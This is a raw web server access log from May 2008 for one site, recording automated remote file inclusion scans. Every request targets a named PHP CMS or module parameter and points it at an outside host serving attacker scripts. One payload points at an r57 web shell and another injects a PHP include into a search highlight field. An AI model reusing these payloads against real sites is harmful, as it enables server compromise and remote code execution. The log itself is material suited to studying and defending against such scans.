212.113.24.150 - - [19/May/2008:11:21:45 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [19/May/2008:11:21:46 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:22:06 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:22:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:22:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:11:22:21 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:22:31 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:22:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:11:22:41 -0700] "GET /logs/access_080218.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:22:46 -0700] "GET /logs/scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:22:46 -0700] "GET /scanhttp://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:22:50 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.221.91.28 - - [19/May/2008:11:22:54 -0700] "GET /logs/access_080215.log/index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:22:57 -0700] "GET /logs/access_080225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:22:58 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:22:58 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:22:58 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.58.138.166 - - [19/May/2008:11:22:59 -0700] "GET /logs/access_080327.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.91.28 - - [19/May/2008:11:22:59 -0700] "GET /logs/index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [19/May/2008:11:23:01 -0700] "GET /index.php?x=http://1nb0x.iespana.es/t3st??? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
195.155.232.37 - - [19/May/2008:11:23:15 -0700] "GET /content.php?seite=http://boxstr.com/files/2046601_dplxv/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:23:31 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:23:32 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [19/May/2008:11:23:34 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:35 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:35 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:23:39 -0700] "GET /logs/access_080225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:23:40 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:11:23:40 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [19/May/2008:11:23:40 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:23:40 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:43 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:11:23:44 -0700] "GET /logs/access_080312.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:11:23:45 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:11:23:45 -0700] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:53 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:55 -0700] "GET /logs/access_080312.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:23:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [19/May/2008:11:24:01 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:24:02 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:24:22 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:24:29 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:24:41 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.24.154 - - [19/May/2008:11:24:44 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.36.222.34 - - [19/May/2008:11:24:48 -0700] "GET /logs/index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:24:48 -0700] "GET /logs/index.php?content=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.24.154 - - [19/May/2008:11:24:54 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:25:01 -0700] "GET /index.php?content=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:25:15 -0700] "GET /logs/access_080113.log//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:25:19 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.16.26.124 - - [19/May/2008:11:25:31 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 200 11607 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:25:37 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:25:37 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:25:37 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:25:37 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:25:53 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:25:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:11:25:53 -0700] "GET /logs/access_080218.log//modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:25:54 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:25:55 -0700] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:26:22 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:26:23 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:26:23 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:26:28 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:26:28 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:27:05 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.161.162 - - [19/May/2008:11:27:05 -0700] "GET /logs/access_080212.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gok.superhost.pl/administrator/components/com_securityimages/patches/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.48.67.39 - - [19/May/2008:11:27:27 -0700] "GET /logs/access_080212.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [19/May/2008:11:27:29 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://1nb0x.iespana.es/t3st?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:27:44 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:27:45 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:27:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.59 - - [19/May/2008:11:27:51 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:28:02 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:28:02 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:28:03 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:28:16 -0700] "GET //modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:28:23 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:28:24 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:11:28:28 -0700] "GET /logs/access_080327.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:29:00 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:29:01 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:29:01 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:29:01 -0700] "GET /convert/mvcw.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:22 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:22 -0700] "GET /modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:50 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.90.217.177 - - [19/May/2008:11:29:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:30:00 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:30:10 -0700] "GET /logs/db.php?path_local=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:30:14 -0700] "GET /db.php?path_local=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:30:23 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:30:23 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:30:58 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:30:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:30:59 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.178.201 - - [19/May/2008:11:31:00 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.116.103.45 - - [19/May/2008:11:31:12 -0700] "GET /logs/errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:31:19 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:31:26 -0700] "GET /logs/index.php?content=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:31:30 -0700] "GET /index.php?content=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:31:30 -0700] "GET /logs/index.php?content=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/May/2008:11:31:32 -0700] "GET /index.php?content=http://8-p.ru/components/id.txt???? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:31:47 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:11:31:51 -0700] "GET /logs/access_080327.log/index2.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:11:31:53 -0700] "GET /logs/access_080327.log/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.232.188 - - [19/May/2008:11:32:26 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.h1.ripway.com/qalby/shell/r57?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.13.86.241 - - [19/May/2008:11:32:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
